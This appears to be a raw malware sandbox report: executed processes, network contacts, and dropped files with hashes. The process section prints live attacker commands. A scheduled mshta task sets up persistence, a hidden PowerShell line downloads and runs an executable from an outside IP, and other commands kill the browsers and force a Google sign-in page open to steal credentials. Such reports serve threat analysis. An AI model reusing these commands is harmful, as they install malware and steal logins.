schtasks /create /tn OXTLVmaes7i /tr "mshta C:\Users\Admin\AppData\Local\Temp\eZLOEW1ax.hta" /sc minute /mo 25 /ru "Admin" /f

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'L15IXT4HYZ2ESTVJPYU9FDMMYBPMMTXI.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\10108480121\am_no.cmd" "

C:\Windows\SysWOW64\timeout.exe

timeout /t 2

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"

C:\Users\Admin\AppData\Local\TempL15IXT4HYZ2ESTVJPYU9FDMMYBPMMTXI.EXE

"C:\Users\Admin\AppData\Local\TempL15IXT4HYZ2ESTVJPYU9FDMMYBPMMTXI.EXE"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /tn "nVw3zmaCugA" /tr "mshta \"C:\Temp\C5jLSyw6s.hta\"" /sc minute /mo 25 /ru "Admin" /f

C:\Windows\SysWOW64\mshta.exe

mshta "C:\Temp\C5jLSyw6s.hta"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;

C:\Users\Admin\AppData\Local\Temp\10108680101\2asf3YX.exe

"C:\Users\Admin\AppData\Local\Temp\10108680101\2asf3YX.exe"

C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe

"C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"

C:\Users\Admin\AppData\Local\Temp\10108710101\561b99cbf5.exe

"C:\Users\Admin\AppData\Local\Temp\10108710101\561b99cbf5.exe"

C:\Users\Admin\AppData\Local\Temp\10108720101\5830bccfba.exe

"C:\Users\Admin\AppData\Local\Temp\10108720101\5830bccfba.exe"

C:\Users\Admin\AppData\Local\Temp\10108720101\5830bccfba.exe

"C:\Users\Admin\AppData\Local\Temp\10108720101\5830bccfba.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 636 -ip 636

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 636 -s 812

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"

C:\Users\Admin\AppData\Local\Temp\10108730101\49309c0b92.exe

"C:\Users\Admin\AppData\Local\Temp\10108730101\49309c0b92.exe"

C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"

C:\Users\Admin\AppData\Local\Temp\10108740101\1f3ecc566c.exe

"C:\Users\Admin\AppData\Local\Temp\10108740101\1f3ecc566c.exe"

C:\Users\Admin\AppData\Local\Temp\10108750101\a53c2ef5e2.exe

"C:\Users\Admin\AppData\Local\Temp\10108750101\a53c2ef5e2.exe"

C:\Users\Admin\AppData\Local\Temp\10108760101\3a82a50014.exe

"C:\Users\Admin\AppData\Local\Temp\10108760101\3a82a50014.exe"

C:\Users\Admin\AppData\Local\Temp\10108770101\68a19ce725.exe

"C:\Users\Admin\AppData\Local\Temp\10108770101\68a19ce725.exe"

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM firefox.exe /T

C:\Users\Admin\AppData\Local\Temp\88J2R05CLKFFTOLX.exe

"C:\Users\Admin\AppData\Local\Temp\88J2R05CLKFFTOLX.exe"

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM chrome.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM msedge.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM opera.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM brave.exe /T

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2000 -parentBuildID 20240401114208 -prefsHandle 1928 -prefMapHandle 1920 -prefsLen 27368 -prefMapSize 244628 -appDir "C:\Program Files\Mozilla Firefox\browser" - {d1ce29bd-a2c1-456e-834c-16e7269aea66} 516 "\\.\pipe\gecko-crash-server-pipe.516" gpu

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2436 -parentBuildID 20240401114208 -prefsHandle 2428 -prefMapHandle 2416 -prefsLen 28288 -prefMapSize 244628 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {29b4fb96-3fad-4f8d-825b-c9ea27b67642} 516 "\\.\pipe\gecko-crash-server-pipe.516" socket

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3224 -childID 1 -isForBrowser -prefsHandle 3240 -prefMapHandle 3236 -prefsLen 22684 -prefMapSize 244628 -jsInitHandle 1272 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {48d81acd-b0ac-488c-9bd1-6850e7e56064} 516 "\\.\pipe\gecko-crash-server-pipe.516" tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3980 -childID 2 -isForBrowser -prefsHandle 3996 -prefMapHandle 2688 -prefsLen 32778 -prefMapSize 244628 -jsInitHandle 1272 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {b0a590be-7e65-47bb-9696-7822e28e5ab3} 516 "\\.\pipe\gecko-crash-server-pipe.516" tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4896 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4900 -prefMapHandle 4816 -prefsLen 32778 -prefMapSize 244628 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {a9282c8f-b678-4fb1-aa67-3efc0a53833e} 516 "\\.\pipe\gecko-crash-server-pipe.516" utility

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5232 -childID 3 -isForBrowser -prefsHandle 5224 -prefMapHandle 4112 -prefsLen 27083 -prefMapSize 244628 -jsInitHandle 1272 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {f096e554-6c1f-47a8-98ef-03b0431cc8eb} 516 "\\.\pipe\gecko-crash-server-pipe.516" tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5356 -childID 4 -isForBrowser -prefsHandle 5364 -prefMapHandle 5368 -prefsLen 27083 -prefMapSize 244628 -jsInitHandle 1272 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {f5fe5da7-af72-4a22-af82-e6dd375f31b9} 516 "\\.\pipe\gecko-crash-server-pipe.516" tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5588 -childID 5 -isForBrowser -prefsHandle 5664 -prefMapHandle 5660 -prefsLen 27083 -prefMapSize 244628 -jsInitHandle 1272 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {01a0b816-5676-4415-a553-ece2a9d8eabd} 516 "\\.\pipe\gecko-crash-server-pipe.516" tab

C:\Users\Admin\AppData\Local\Temp\10108780101\dd29a77f54.exe

"C:\Users\Admin\AppData\Local\Temp\10108780101\dd29a77f54.exe"

C:\Users\Admin\AppData\Local\Temp\10108790101\2asf3YX.exe

"C:\Users\Admin\AppData\Local\Temp\10108790101\2asf3YX.exe"

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

C:\Users\Admin\AppData\Local\Temp\10108800101\nhDLtPT.exe

"C:\Users\Admin\AppData\Local\Temp\10108800101\nhDLtPT.exe"

C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe

"C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe"

Network

Country Destination Domain Proto
RU 185.215.113.16:80 185.215.113.16 tcp
RU 176.113.115.6:80 176.113.115.6 tcp
RU 176.113.115.7:80 176.113.115.7 tcp
US 8.8.8.8:53 ipinfo.io udp
US 34.117.59.81:443 ipinfo.io tcp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
RU 176.113.115.7:80 176.113.115.7 tcp
RU 176.113.115.7:80 176.113.115.7 tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
NL 91.214.78.34:5556 tcp
US 8.8.8.8:53 exarthynature.run udp
US 104.21.32.1:443 exarthynature.run tcp
US 104.21.32.1:443 exarthynature.run tcp
US 104.21.32.1:443 exarthynature.run tcp
US 104.21.32.1:443 exarthynature.run tcp
US 104.21.32.1:443 exarthynature.run tcp
US 104.21.32.1:443 exarthynature.run tcp
US 104.21.32.1:443 exarthynature.run tcp
NL 185.156.73.73:80 185.156.73.73 tcp
NL 185.156.73.73:80 185.156.73.73 tcp
US 8.8.8.8:53 dawtastream.bet udp
US 8.8.8.8:53 foresctwhispers.top udp
US 8.8.8.8:53 tracnquilforest.life udp
US 8.8.8.8:53 collapimga.fun udp
US 8.8.8.8:53 seizedsentec.online udp
US 8.8.8.8:53 strawpeasaen.fun udp
US 8.8.8.8:53 quietswtreams.life udp
US 8.8.8.8:53 starrynsightsky.icu udp
US 8.8.8.8:53 earthsymphzony.today udp
US 8.8.8.8:53 steamcommunity.com udp
GB 104.82.234.109:443 steamcommunity.com tcp
US 8.8.8.8:53 farmingtzricks.top udp
US 172.67.220.226:443 farmingtzricks.top tcp
US 172.67.220.226:443 farmingtzricks.top tcp
US 172.67.220.226:443 farmingtzricks.top tcp
US 172.67.220.226:443 farmingtzricks.top tcp
RU 176.113.115.7:80 176.113.115.7 tcp
US 172.67.220.226:443 farmingtzricks.top tcp
US 172.67.220.226:443 farmingtzricks.top tcp
US 172.67.220.226:443 farmingtzricks.top tcp
US 8.8.8.8:53 croprojegies.run udp
US 104.21.80.1:443 croprojegies.run tcp
US 104.21.80.1:443 croprojegies.run tcp
US 104.21.80.1:443 croprojegies.run tcp
US 104.21.80.1:443 croprojegies.run tcp
US 104.21.80.1:443 croprojegies.run tcp
US 104.21.80.1:443 croprojegies.run tcp
US 104.21.80.1:443 croprojegies.run tcp
RU 45.93.20.28:80 45.93.20.28 tcp
RU 176.113.115.7:80 176.113.115.7 tcp
US 8.8.8.8:53 youtube.com udp
US 8.8.8.8:53 spocs.getpocket.com udp
US 8.8.8.8:53 firefox-api-proxy.cdn.mozilla.net udp
US 34.149.97.1:443 firefox-api-proxy.cdn.mozilla.net udp
US 8.8.8.8:53 prod.content-signature-chains.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 prod.ads.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net udp
US 34.149.97.1:443 firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net tcp
US 8.8.8.8:53 shavar.prod.mozaws.net udp
US 8.8.8.8:53 prod.content-signature-chains.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 prod.ads.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 shavar.prod.mozaws.net udp
N/A 127.0.0.1:62188 tcp
N/A 127.0.0.1:62195 tcp
US 8.8.8.8:53 prod.remote-settings.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 prod.remote-settings.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net udp
GB 142.250.187.206:443 youtube.com tcp
GB 142.250.187.206:443 youtube.com tcp
US 8.8.8.8:53 youtube.com udp
US 8.8.8.8:53 tracking-protection.cdn.mozilla.net udp
US 8.8.8.8:53 youtube.com udp
GB 142.250.187.206:443 youtube.com udp
US 8.8.8.8:53 www.youtube.com udp
US 34.120.158.37:443 tracking-protection.cdn.mozilla.net tcp
US 8.8.8.8:53 tracking-protection.prod.mozaws.net udp
US 8.8.8.8:53 tracking-protection.prod.mozaws.net udp
GB 142.250.187.206:443 www.youtube.com tcp
US 8.8.8.8:53 youtube-ui.l.google.com udp
US 8.8.8.8:53 tracking-protection.cdn.mozilla.net udp
US 34.120.158.37:443 tracking-protection.cdn.mozilla.net tcp
GB 142.250.187.206:443 youtube-ui.l.google.com tcp
GB 142.250.187.206:443 youtube-ui.l.google.com udp
US 8.8.8.8:53 consent.youtube.com udp
GB 216.58.213.14:443 consent.youtube.com tcp
US 8.8.8.8:53 consent.youtube.com udp
US 8.8.8.8:53 consent.youtube.com udp
US 34.120.158.37:443 tracking-protection.cdn.mozilla.net tcp
GB 216.58.213.14:443 consent.youtube.com udp
US 34.120.158.37:443 tracking-protection.cdn.mozilla.net tcp
US 34.120.158.37:443 tracking-protection.cdn.mozilla.net tcp
US 8.8.8.8:53 youtube-ui.l.google.com udp
US 34.120.158.37:443 tracking-protection.cdn.mozilla.net tcp
US 8.8.8.8:53 www.google.com udp
US 34.120.158.37:443 tracking-protection.cdn.mozilla.net tcp
GB 216.58.201.100:443 www.google.com tcp
US 8.8.8.8:53 www.google.com udp
US 8.8.8.8:53 www.google.com udp
GB 216.58.201.100:443 www.google.com udp
US 34.120.158.37:443 tracking-protection.cdn.mozilla.net tcp
US 34.120.158.37:443 tracking-protection.cdn.mozilla.net tcp
US 34.120.158.37:443 tracking-protection.cdn.mozilla.net tcp
US 34.120.158.37:443 tracking-protection.cdn.mozilla.net tcp
US 34.120.158.37:443 tracking-protection.cdn.mozilla.net tcp
US 8.8.8.8:53 tracking-protection.prod.mozaws.net udp
US 34.120.158.37:443 tracking-protection.cdn.mozilla.net tcp
RU 176.113.115.7:80 176.113.115.7 tcp
US 34.120.158.37:443 tracking-protection.cdn.mozilla.net tcp
US 34.120.158.37:443 tracking-protection.cdn.mozilla.net tcp
US 8.8.8.8:53 cobolrationumelawrtewarms.com udp
NL 107.189.27.66:80 cobolrationumelawrtewarms.com tcp

Files

C:\Users\Admin\AppData\Local\Temp\zbIoMqsNd.hta

MD5 f11a581b3b827262496481540e40a4a4
SHA1 6da029beed230df9059d5ec3c7f1fd5cba4c3f38
SHA256 eb15a3aa1e6d6e51dd6f130ca32a6ab111ec6c9b67d9106ee051ae0ebacf0a89
SHA512 4f5c47dfc4d4c94e88bb8bfaa6d753280bd323b4ce9f7e9b33eb70e5764984cdf87e84c5489e0b72a7269cdb9eccadd79f0d4d1fae9a0df084a92b67dee95d45

memory/2896-2-0x0000000005100000-0x0000000005136000-memory.dmp

memory/2896-3-0x00000000057B0000-0x0000000005DD8000-memory.dmp

memory/2896-4-0x0000000005E40000-0x0000000005E62000-memory.dmp

memory/2896-5-0x0000000005FE0000-0x0000000006046000-memory.dmp

memory/2896-6-0x00000000060C0000-0x0000000006126000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_dj0d2apw.jwv.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2896-16-0x0000000006130000-0x0000000006484000-memory.dmp

memory/2896-17-0x00000000066D0000-0x00000000066EE000-memory.dmp

memory/2896-18-0x0000000006780000-0x00000000067CC000-memory.dmp

memory/2896-19-0x0000000007F10000-0x000000000858A000-memory.dmp

memory/2896-20-0x0000000006C10000-0x0000000006C2A000-memory.dmp

memory/2896-23-0x0000000007C70000-0x0000000007D06000-memory.dmp

memory/2896-24-0x0000000007BD0000-0x0000000007BF2000-memory.dmp

memory/2896-25-0x0000000008B40000-0x00000000090E4000-memory.dmp

C:\Users\Admin\AppData\Local\TempVFEBH7OAHZNTRQBATY3VJGWKSA8CRWCF.EXE

MD5 93da4bdbae52d91d32a34c140466e8cf
SHA1 2177f234160ef77058d2237a8f97c1d663647240
SHA256 878228e580cd27a72a847922f9b16b7d16d0797c68aa9e6642ae3da13518de7a
SHA512 14d14d6d8d436953ed43483b8b3ba30a4f1df73eb2eca055c047bb0b7e328150ae0c49122a657f5f8ab752872e5d40b791e793675110df5c90440077f446b91a

memory/2932-35-0x0000000000C70000-0x0000000001132000-memory.dmp

memory/796-47-0x0000000000FC0000-0x0000000001482000-memory.dmp

memory/2932-49-0x0000000000C70000-0x0000000001132000-memory.dmp

memory/796-50-0x0000000000FC0000-0x0000000001482000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10108450101\BUZd3Mq.exe

MD5 ff130f0907781b9b0564a2e34350bda9
SHA1 968fd9f8787bda595df9a1670d28e8b129bbea99
SHA256 820ab89ef3e39e2ec7f7322c4710a7fbb1cc01b5cc28043f607f30312119a1b5
SHA512 8e5feb41fcfdf2366c8da4fda8d37eb29defb839689cacfdaf50d03604447e18e9cf83f31d90f7f48fce0ad40add335cf85b0c3b135de396e5971c19fd239e1f

C:\Users\Admin\AppData\Local\Temp\Build.exe

MD5 a94e37aebedaf87a3763e1c7766b5940
SHA1 d9064a5ec1ea7957cdde14a26e8b58ec9981fb0a
SHA256 7ee9298b5c6f9e90309c31684e030960cac17d71ca1316a2493843ef35d2cd70
SHA512 a82cf09a3048278b7439aedd6b2a9c5c4b528d42b5650881c88b39bc3cd4d40f995dbec2d8a2b8e1f4fc8e0e041b27f932b36fd67a4da268e5dd9f479517c948

C:\Users\Admin\AppData\Local\Temp\Lappy.A.vbs

MD5 3811496e1794473ea967dcd32594ccbb
SHA1 80d98553d718103ce5d52cacd64367d71ba4edd5
SHA256 477a23adf9b2e3b1b595dde107ee8f1a409671491e74b21e5ffdb0062525fc0d
SHA512 9cefbd14f7a3343c164397972d177c32b7ca5f72127c34481d02068ef4c78825cf40208b8e6869535726cdf6852b55b9d89d6850bf42af50c746de494a1185c3

memory/2848-84-0x0000000000B50000-0x0000000000BE4000-memory.dmp

memory/2848-85-0x00000000056B0000-0x0000000005872000-memory.dmp

memory/2848-86-0x0000000006530000-0x0000000006A5C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\212.102.63.147\Browsers\Firefox\FirefoxBookmarks.txt

MD5 2e9d094dda5cdc3ce6519f75943a4ff4
SHA1 5d989b4ac8b699781681fe75ed9ef98191a5096c
SHA256 c84c98bbf5e0ef9c8d0708b5d60c5bb656b7d6be5135d7f7a8d25557e08cf142
SHA512 d1f7eed00959e902bdb2125b91721460d3ff99f3bdfc1f2a343d4f58e8d4e5e5a06c0c6cdc0379211c94510f7c00d7a8b34fa7d0ca0c3d54cbbe878f1e9812b7

memory/796-131-0x0000000000FC0000-0x0000000001482000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10108470101\0c6733a3b9.exe

MD5 07164c5597a4fbd5cf8c5ebcc43fcbd3
SHA1 d8ffc868f9a36ab2323440bc0a263e2e3e52def3
SHA256 2ea53f7442f44cfc2ea88f2b52d6841ec009d4789f67fd002530e4dece4235d3
SHA512 87d4f793aee02e5e484588913034caddfab25381a959815c57d0ec2979539c641a25cabe43c917659cc912d851c5d7d7dc64f02a01e541b554b3eedc8e0477d9

C:\Users\Admin\AppData\Local\Temp\eZLOEW1ax.hta

MD5 4a34ead0ee6b6933a3b8b5ee80327708
SHA1 8d95af383ab6125c34712d655ccce37db9985eaf
SHA256 7f0e5687be8a2c1e0ceacea94cce6d423322c938434cb5a714c4293f2c9ef781
SHA512 055e957a9f2581f2f426ddbfa39ba6573c0796ada5a18b8ea449d1dea4d395e0f8ed908b9e86fb81ac11739159079b30c616bd41c6c3c8e6514e8f082d193bff

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

MD5 25604a2821749d30ca35877a7669dff9
SHA1 49c624275363c7b6768452db6868f8100aa967be
SHA256 7f036b1837d205690b992027eb8b81939ba0228fc296d3f30039eeba00bd4476
SHA512 206d70af0b332208ace2565699f5b5da82b6a3806ffa51dd05f16ab568a887d63449da79bbaeb46183038837446a49515d62cb6615e5c5b27563cd5f774b93f5

memory/4960-162-0x0000000005B30000-0x0000000005E84000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 b75b85bfad2d06f1ccf71cc19dfba27e
SHA1 b4af2261046804c10c10ede54fb2ce73a303cce4
SHA256 d69e5a13607b1332ecc9a1ca45841370cc101cba3a02c17d127fd9775c6078e3
SHA512 63960e5a4542ae5a598882f077e81ac87a624388bdf55b49995c4ceaad172b0b4cb3fdd524548f04f063e972732d0bd7939ce33df0b2c18302290bbd7470db16

memory/4960-164-0x0000000006220000-0x000000000626C000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

MD5 06ad34f9739c5159b4d92d702545bd49
SHA1 9152a0d4f153f3f40f7e606be75f81b582ee0c17
SHA256 474813b625f00710f29fa3b488235a6a22201851efb336bddf60d7d24a66bfba
SHA512 c272cd28ae164d465b779163ba9eca6a28261376414c6bbdfbd9f2128adb7f7ff1420e536b4d6000d0301ded2ec9036bc5c657588458bff41f176bdce8d74f92

C:\Users\Admin\AppData\Local\Temp\10108480121\am_no.cmd

MD5 cedac8d9ac1fbd8d4cfc76ebe20d37f9
SHA1 b0db8b540841091f32a91fd8b7abcd81d9632802
SHA256 5e951726842c371240a6af79d8da7170180f256df94eac5966c07f04ef4d120b
SHA512 ce383ffef8c3c04983e752b7f201b5df2289af057e819cdf7310a55a295790935a70e6a0784a6fd1d6898564a3babab1ffcfbaa0cc0d36e5e042adeb3c293fa5

memory/796-176-0x0000000000FC0000-0x0000000001482000-memory.dmp

C:\Users\Admin\AppData\Local\TempL15IXT4HYZ2ESTVJPYU9FDMMYBPMMTXI.EXE

MD5 1565063ca3d43812789fbf960418659e
SHA1 d710ecdf1861e25498d1886f8c2a44f31826fd55
SHA256 c5b7480a6d02c38a408981322c52ad0d6efbdc0a0d6508d788d3575c561cc978
SHA512 eb044ea8ecdfed744685623fd3bf16dc0221900b405eff580d93de62073e31b93b23b69e81fea1a2bff6deac793cee038587d127fb3ddcca1359f3380f7cca42

memory/1116-195-0x0000000000790000-0x0000000000C4C000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 ec0fb17cd7bda2d278fd3af69aa08681
SHA1 1d75c9efb572d18942b0f7ba9ff73f3075e8f80c
SHA256 84e8ac44424376fda44fa15fc49b68ae8bb1346ae5fb6961ba85c72c0d00c5c1
SHA512 86b4aeef07f5dc8f3095fadca8532c78ec527deb5d2b4f9debf8e9bb2dfa66a12336d5a650c704e44536421457bd04939c9912a1bc6a0fc497cd8148ebc6650c

memory/1116-210-0x0000000000790000-0x0000000000C4C000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 8586e006be6bdb10ca33901f828a7893
SHA1 3576ed33e2ba06447f0c7df2fe7884b778e72440
SHA256 6cff4149a7e299ff68a30b0e7c062878d4c265eac57a5a1843741f0648641173
SHA512 e7f759368a251047d93f81b999c5e85bbd33e8ce41207ecff6fe07df5a5a75f6559690bb6bac1e3b2c6571b2db4343971f83c281f2bfa63f68a5f86ec3f8d623

C:\Temp\C5jLSyw6s.hta

MD5 39c8cd50176057af3728802964f92d49
SHA1 68fc10a10997d7ad00142fc0de393fe3500c8017
SHA256 f685edf8437c0b505f5e366d8b1cb79e7770361cc4906240e7f8c8ad32c94e84
SHA512 cf563b2b5a3553acf3a91298936b904abf87620c2fc582bcdb45dec5d4b877bef5ae81feae4b741e1aee1a916e543b5f6914d9c494d2aa33bc6f15c6fc904cc6

memory/1180-233-0x00000000062A0000-0x00000000065F4000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 c4d64e33c4e1119e9f9685147ff235af
SHA1 21af258889f1ae59c920793bbee0252465ffd1fe
SHA256 21f554c4fd474c2517e6c1bc726a6ea121e9211d155fc07274431bbbc3a9d86f
SHA512 fc6f4d762aec512834fcbb5eeae8af8131b7409b8a63486b18cc43f66bcd165eec5aab8b4b46b9cf542cdfacd4090ff4bd0b3fe1099558991d4c93c69f19fc10

memory/1180-235-0x0000000006830000-0x000000000687C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10108680101\2asf3YX.exe

MD5 19d2fe8a5d6c2174fb2a5c54e98523e0
SHA1 8e0a2cf8cbff8c169cba1e0a3785083ebeb5a627
SHA256 8a12b05f92dbb47d713dbc73cccccb089fc88f6ba96b5a64f42aaf6431e5616e
SHA512 3ff858f79a4e55f6728369b0f0d6de6060dbc4728ab21e5c352c209ef92b203f3039a623118706227ac61f75ab8b68ae4958d7939a000729de0890b54706ca95

memory/2100-253-0x00000236EF4A0000-0x00000236EF524000-memory.dmp

memory/2100-255-0x00000236F1C90000-0x00000236F1E52000-memory.dmp

memory/2100-254-0x00000236F1A50000-0x00000236F1AA0000-memory.dmp

memory/2100-256-0x00000236F1B40000-0x00000236F1BB6000-memory.dmp

memory/2100-257-0x00000236F2BE0000-0x00000236F3108000-memory.dmp

memory/2100-258-0x00000236EFA10000-0x00000236EFA22000-memory.dmp

memory/2100-259-0x00000236EFA30000-0x00000236EFA4E000-memory.dmp

memory/4148-269-0x0000000000CF0000-0x00000000011AC000-memory.dmp

memory/4148-272-0x0000000000CF0000-0x00000000011AC000-memory.dmp

memory/796-273-0x0000000000FC0000-0x0000000001482000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10108710101\561b99cbf5.exe

MD5 aa512b143958cbbe85c4fb41bb9ba3fa
SHA1 46459666d53ecb974385698aa8c306e49c1110ab
SHA256 8852cc3effc2d3698b05859fa1a18a758b26712263d38ea2de7ef138a31c2b26
SHA512 9ab9dbf0d0f7861bf18738d59f03b20f0552461857d4ff3f68d25cc4621f85aaab94050217a1a0c6d3c5a0adb09411a21a6541dcd1042b2a95413c65b2ec0333

memory/4904-288-0x00000000004E0000-0x0000000000ECD000-memory.dmp

memory/796-289-0x0000000000FC0000-0x0000000001482000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10108720101\5830bccfba.exe

MD5 c83ea72877981be2d651f27b0b56efec
SHA1 8d79c3cd3d04165b5cd5c43d6f628359940709a7
SHA256 13783c2615668fba4a503cbefdc18f8bc3d10d311d8dfe12f8f89868ed520482
SHA512 d212c563fdce1092d6d29e03928f142807c465ecaaead4fe9d8949b6f36184b8d067a830361559d59fc00d3bbe88feda03d67b549d54f0ec268e9e75698c1dd0

memory/636-307-0x0000000000600000-0x0000000000678000-memory.dmp

memory/1716-309-0x0000000000400000-0x0000000000465000-memory.dmp

memory/1716-311-0x0000000000400000-0x0000000000465000-memory.dmp

memory/4904-313-0x00000000004E0000-0x0000000000ECD000-memory.dmp

memory/4324-314-0x0000000000FC0000-0x0000000001482000-memory.dmp

memory/4324-315-0x0000000000FC0000-0x0000000001482000-memory.dmp

